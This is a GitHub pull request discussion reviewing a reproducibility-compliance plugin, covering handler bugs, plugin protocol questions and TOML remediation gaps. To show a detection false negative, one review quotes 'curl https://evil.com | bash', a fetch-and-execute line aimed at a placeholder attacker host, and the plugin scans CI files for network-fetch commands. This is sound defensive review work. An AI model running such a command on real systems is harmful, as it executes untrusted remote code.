feat: scientific reproducibility plugin#138
Conversation
mlieberman85
left a comment
There was a problem hiding this comment.
PR Review: Scientific Reproducibility Plugin
Tested all 5 handlers against this repo. L1 controls (deps pinned, build env declared) and L2 hermetic build pass. L2 provenance and L3 bit-for-bit are correctly INCONCLUSIVE. The plugin structure follows established patterns.
Bug: Hermetic build handler has false negatives
repro_hermetic_build_handler checks for safe patterns at the file level, not per-line. If any safe pattern (e.g. uv sync) appears anywhere in a workflow file, all suspicious patterns (curl, apt-get install) in that same file are silently ignored:
is_safe = any(safe in content for safe in safe_patterns)
if pattern in content and not is_safe:
violations.append(...)A workflow containing both uv sync and curl https://evil.com | bash passes as "hermetic." The safe-pattern check needs to be per-line or per-step, not per-file.
Note: Hermetic build check is a starting point
The RE-02.01 handler greps CI YAML for obvious network fetch commands, which is a reasonable first pass but doesn't verify actual build isolation. It will miss network access from Makefiles, setup.py, or anything not invoked via the checked CLI tools, and will false-fail on legitimate post-build uses of curl/wget. True hermetic build enforcement likely requires an isolation mechanism — something like Witness for runtime attestation, or build systems with built-in sandboxing like Bazel (--sandbox_network=false) or Nix. Worth opening an issue to track evolving this control.
Bug: Same plugin.py indentation issue
Lines 114, 136, 151, 165 — identical to #136 and #137. All Marc-cn PRs share this.
Minor
- No tests in the diff (PR claims 28 tests). I wrote 44 (31 handler tests + 13 implementation tests), all pass.
- Remediation for RE-01.01 hardcodes
uv lock— won't help non-Python projects - Missing SARIF fields (acknowledged)
What's good
- Well-chosen controls that cover the reproducibility spectrum (L1 basic hygiene → L3 bit-for-bit)
- Handlers are filesystem-based with no subprocess calls — easy to test, no external tool dependencies
- Good evidence collection (lists all files checked and found)
- Conservative defaults — returns INCONCLUSIVE when signals are absent rather than guessing
…g isinstance checks
…otocol, loader forge/build storage, add tests
|
Applied the same fixes from #136 and #137:
"Note: Hermetic build check is a starting point", should we open a GitHub issue to track it? Something like "RE-02.01 HermeticBuild: evolve beyond grep-based heuristic toward runtime attestation". |
|
@Marc-cn let's create a tracking issue with how you see this going and we can track where we're going with it and what you plan to support out of the gate and what you plan to support long term. |
mlieberman85
left a comment
There was a problem hiding this comment.
Re-review: hermetic build fix is correct, structural questions remain
The per-line refactor of repro_hermetic_build_handler is right and the new regression test (test_pass_does_not_ignore_violations_when_safe_pattern_present) explicitly nails the bug class I flagged. Nice. Workspace registration looks correct; the package will actually be discoverable now.
Fixed since last review ✅
- Hermetic build per-line check (and a regression test that would have caught the original bug).
plugin.pyindentation — handled in the shared base path; not in this diff.- Workspace registration — root
pyproject.tomlnow listsdarnit-reproducibilityas a workspace dep. - Tests added (14 handler tests + implementation tests).
Still outstanding ⚠️
Tracking issue for HermeticBuild evolution — I asked you to open one a while back so we can plan out what RE-02.01 supports out of the gate vs. long term (Witness / Bazel sandbox / Nix / etc.). I couldn't find one. Could you open it before merge? A short writeup of: (a) what the v0.1 grep heuristic catches and misses, (b) what "true" hermeticity verification would require, (c) which signals you'd want to add next (composite actions, Makefile, setup.py, runtime attestation). Link it from RE-02.01 in reproducibility.toml so the limitation is visible to anyone reading the control.
Structural questions — please clarify before merge
See inline comments. Short version:
- Two ways to expose handlers (
register_sieve_handlers()+get_check_handlers()) — which does the framework actually consume? If both, why? - Two framework-path entry points (
darnit.frameworks→get_framework_path()anddarnit.implementations→impl.get_framework_config_path()) returning the same path. Pick one. [controls."RE-01.01".remediation]exists in TOML butget_remediation_registry()returns{}. Does the framework auto-load TOML remediations, or is there a wiring gap?
None of these break correctness today, but the protocol surface for plugin authors is becoming muddled and worth tightening before another plugin lands.
Minor
pyproject.tomlandreproducibility.tomlboth lack trailing newlines (\ No newline at end of filein diff). Add them.RE-01.01remediation hardcodesuv lock— fine for v0.1 (and thespec_version = "repro v0.1"is honest about scope), but please add a TOML comment noting it's Python-only and a TODO for per-language detection. Otherwise users withCargo.tomlwill get a confusing remediation suggestion.get_controls_by_levelbuilds the full 5-control list on every call, then filters. Build once and cache, or just haveget_all_controlsiterate directly. Cosmetic.spec_version = "repro v0.1"— other implementations use a more URI-like spec_version string ("https://baseline.openssf.org/versions/2025-10-10"). Pick a stable identifier scheme now while there's only one version.
What's good
- The five controls hit the right reproducibility ladder rungs (pinned deps → declared env → hermetic build → provenance → bit-for-bit), and each is appropriately conservative — INCONCLUSIVE when the signal isn't there, rather than false PASS.
- Handlers are pure-filesystem with no subprocess calls; trivially testable.
- Test coverage exercises both happy path and the specific regression case.
- Plugin structure (entry points,
register(),register_sieve_handlers, framework TOML) follows the established pattern fromdarnit-baselinecleanly.
Verdict: Lift the tracking-issue ask + the three structural clarifications, and this is mergeable. Bug fix itself is approved.
| "repro_deps_pinned": handlers.repro_deps_pinned_handler, | ||
| "repro_build_env_declared": handlers.repro_build_env_declared_handler, | ||
| "repro_hermetic_build": handlers.repro_hermetic_build_handler, | ||
| "repro_provenance_exists": handlers.repro_provenance_exists_handler, |
There was a problem hiding this comment.
Two handler-exposure surfaces here — register_sieve_handlers() (called from __init__.py:register(), registers directly with the global registry) and get_check_handlers() (returns a dict). Which one does the framework actually consume?
If both: each plugin author now has to keep two parallel lists in sync, and forgetting one will silently break in different ways depending on which code path the framework hits. I'd push for one canonical surface and delete the other.
If the answer is "register_sieve_handlers is the real one, get_check_handlers is for some legacy/MCP-tool path," please drop a comment on get_check_handlers saying so.
|
|
||
|
|
||
| def get_framework_path() -> Path: | ||
| """Entry point for framework TOML discovery.""" |
There was a problem hiding this comment.
Two entry points pointing at the same TOML:
darnit.implementations→register()→impl.get_framework_config_path()returnsreproducibility.tomldarnit.frameworks→get_framework_path()returns the samereproducibility.toml
Is the darnit.frameworks entry point still required by the loader, or is get_framework_config_path() on the implementation enough now? If both are required, OK — but please document why so future plugin authors don't have to reverse-engineer it. If only one is needed, drop the other.
| level=2, | ||
| domain="RE", | ||
| metadata={}, | ||
| ), |
There was a problem hiding this comment.
get_remediation_registry() returns {}, but reproducibility.toml defines a real remediation for RE-01.01:
[[controls."RE-01.01".remediation.handlers]]
handler = "exec"
command = ["uv", "lock"]
dry_run_command = ["uv", "lock", "--dry-run"]Does the framework auto-load TOML-defined remediations and merge them with get_remediation_registry()? If yes, please confirm with a quick test that darnit run --remediate actually picks up the uv lock step. If no, this remediation is dead config and you'd need to expose it through the registry.
| dry_run_command = ["uv", "lock", "--dry-run"] | ||
|
|
||
| # ============================================================================= | ||
| # Control: Is the build environment declared? |
There was a problem hiding this comment.
uv lock is Python-specific and will produce a confusing suggestion on, e.g., a Rust or Go project that fails this control because they have no lock file. Two options:
- Detect language from
project.primary_language(now stored by the loader change in feat: LangGraph agentic orchestrator: state machine, LLM backends, CLI run, human feedback #137) and gate the remediation onpython. - For v0.1, just add a TOML comment +
# TODOnoting this is Python-only and add a tracking issue for per-language remediation.
Either is fine; current state silently misleads non-Python users.
| ) | ||
| break # one violation per line is enough | ||
| except Exception: | ||
| continue |
There was a problem hiding this comment.
The hermetic-build check only looks at .github/workflows/*.{yml,yaml} — but real builds frequently fetch deps from Makefile, setup.py, build.sh, composite-action action.yml, or Containerfile/Dockerfile. A workflow that just runs make build will look hermetic here even if the Makefile does curl ... | bash.
This isn't a blocker for v0.1 (it's a documented heuristic), but the limitation should be (a) noted in the docstring so reviewers understand the signal, and (b) captured in the tracking issue I asked for above so we have a roadmap for tightening it.
mlieberman85
left a comment
There was a problem hiding this comment.
Freshen — main has moved; concrete answers to the structural questions
Just bumping this so it doesn't go stale, and I have concrete answers to the structural questions I raised on 2026-05-06 after auditing the live plugin surface on main this past week. No new code review — head hasn't changed since 2026-05-01.
Rebase needed first
Plugin-composition foundational scaffolding (#251) landed on main on 2026-05-19. The PR is no longer a fast-forward and gh pr view reports mergeable: UNKNOWN. Worth rebasing before further review.
Concrete answers to the structural questions
I auditing every call site of these methods in framework code on main (grep -rn in packages/darnit/src/). Here's what's actually consumed:
#1 — register_sieve_handlers() vs get_check_handlers(): Confirmed dead methods on this PR. There are two registries in play and the PR mixes them up:
darnit.core.handlers.get_handler_registry()— for MCP tool handlers — populated byregister_handlers()(called viahasattr(impl, "register_handlers")atpackages/darnit/src/darnit/server/factory.py:81). This is whatdarnit-baselineuses.darnit.sieve.handler_registry.get_sieve_handler_registry()— for sieve-phase check handlers — populated by whatever explicitly callsregistry.register(). The framework never calls a protocol method to do this; your__init__.register()does it directly viaimpl.register_sieve_handlers().
So register_sieve_handlers() is functionally correct (handlers do reach the sieve registry, because __init__.register() calls it during entry-point load) — just badly named, since it isn't part of the protocol and looks like it ought to be auto-called by the framework.
The three getter methods (get_check_handlers / get_context_handlers / get_remediation_handlers) on implementation.py:137-153 are fully dead — they're commented out of the ComplianceImplementation protocol on packages/darnit/src/darnit/core/plugin.py:136-138, and grep -rn finds zero call sites in framework code. Safe to delete the three methods.
#2 — Two framework-path entry points: Still live. darnit.implementations → register() → impl.get_framework_config_path() AND darnit.frameworks → get_framework_path() both return the same reproducibility.toml. Pick one — get_framework_config_path() is the protocol member, so drop the darnit.frameworks entry point and get_framework_path() function.
#3 — get_remediation_registry() returns {} while TOML has [controls."RE-01.01".remediation]: TOML is source of truth for control metadata in this codebase, and RemediationExecutor reads remediation directly from FrameworkConfig.controls[id].remediation (the TOML model), not from impl.get_remediation_registry(). So returning {} is correct today — but if so, why is get_remediation_registry() on the protocol at all? Either drop it from the protocol, or document that it's a legacy hook for Python-side remediation definitions. Either way, fine to leave the PR's return {} — just worth a one-line comment so the next reader doesn't assume it's a wiring gap.
Still-outstanding asks (unchanged)
- HermeticBuild tracking issue (asked 2026-04-13 and 2026-05-06). A short writeup of what the v0.1 grep heuristic catches/misses + what "true" hermeticity needs (Witness / Bazel sandbox / Nix / etc.) + what signals to add next. Link from
RE-02.01inreproducibility.toml. - Trailing newlines on
pyproject.tomlandreproducibility.toml. RE-01.01remediation hardcodesuv lock— fine for v0.1, just please add a TOML comment that it's Python-only with a TODO for per-language detection. OtherwiseCargo.tomlprojects get a confusing suggestion.spec_version = "repro v0.1"vs the URI-style spec_version baseline uses — pick a stable identifier scheme now while there's only one version.
What's the path forward?
If you have appetite to push this across the line: (1) rebase on main, (2) drop the three dead getters + the darnit.frameworks entry point, (3) open the HermeticBuild tracking issue, (4) fix the four nits above. That's a small diff and unblocks merge from my end. Happy to review again promptly when you push.
If you've moved on, no pressure — just say so and I'll close it out cleanly.
Summary
Adds a new compliance domain covering scientific reproducibility of software
builds. Separate from the OpenSSF baseline which focuses on security — this
covers whether a build can be independently reproduced.
Type of Change
Framework Changes Checklist
uv run python scripts/validate_sync.py --verboseand it passesuv run python scripts/generate_docs.pyand committed any doc changesControl/TOML Changes Checklist
Testing
What was built
Cargo.lock, package-lock.json, go.sum, etc.
.devcontainer/, .python-version, etc.
fetches: curl, wget, raw pip install
sigstore/cosign or slsa-github-generator
in CI and reprotest / diffoscope usage
Additional Notes